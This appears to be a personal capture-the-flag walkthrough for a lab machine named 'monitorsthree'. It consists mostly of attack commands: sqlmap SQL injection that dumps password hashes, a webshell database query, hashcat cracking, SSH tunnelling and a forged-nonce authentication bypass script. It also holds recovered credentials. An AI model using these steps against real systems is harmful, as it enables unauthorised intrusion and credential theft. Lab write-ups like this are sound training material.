monitorsthree #
User #
sudo bash -c "echo '10.10.11.30 monitorsthree.htb'>> /etc/hosts"
ffuf -u http://monitorsthree.htb -H "Host:FUZZ.monitorsthree.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -c -ac
sqlmap -u monitorsthree.htb/forgot_password.php --forms --crawl=2 --dbs
sqlmap -u monitorsthree.htb/forgot_password.php --forms --crawl=2 --level=5 --risk=3 -D monitorsthree_db --tables
sqlmap -u monitorsthree.htb/forgot_password.php --forms --crawl=2 --level=5 --risk=3 -D monitorsthree_db -T users -columns
sqlmap -u monitorsthree.htb/forgot_password.php --forms --crawl=2 --level=5 --risk=3 -D monitorsthree_db -T users -C username,password --dump
Database: monitorsthree_db
Table: users
[4 entries]
+-----------+----------------------------------+
| username | password |
+-----------+----------------------------------+
| janderson | 1e68b6eb86b45f6d92f8f292428f77ac |
| admin | 31a181c8372e3afc59dab863430610e8 |
| dthompson | 633b683cc128fe244b00f176c8a950f5 |
| mwatson | c585d01f2eb3e6e1073e92023088a3dd |
+-----------+----------------------------------+
admin : greencacti2001
mysql -ucactiuser -pcactiuser -e "USE cacti;" -e "Select * from user_auth;"
I remeber the terminal being buggy so i just used the webshell
1 admin $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G 0 Administrator marcus@monitorsthree.htb on on on on 2 1 1 1 1 on -1 -1 -1 0 0 436423766
3 guest $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu 0 Guest Account guest@monitorsthree.htb on on on 1 1 1 1 1 -1 -1 -1 0 0 3774379591
4 marcus $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK 0 Marcus marcus@monitorsthree.htb on on on on on 1 1 1 1 1 on -1 -1 0 0 1677427318
hashcat -a 0 -m 3200 hash.txt /usr/share/seclists/rockyou.txt hash.txt -show
marcus : 12345678910
Root #
netstat -tnlp
ssh -i id_rsa marcus@10.10.11.30 -L 127.0.0.1:8080:127.0.0.1:8080
Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
Next convert server passphrase from base64 to hex
59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a
hit forward
wqCENkgcvVIlDPe9Q3HpaNhz+YXmYk8FNLoOQfIzCEM=
var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);
our hex is the 59be string and our ’noncefromburp’ is our wqCE
j65vMghwC8l+b+RjSm2VvMNsA43fKKsf/jnqDW5FfTo=
back on burp hit forward again
now were ready send it on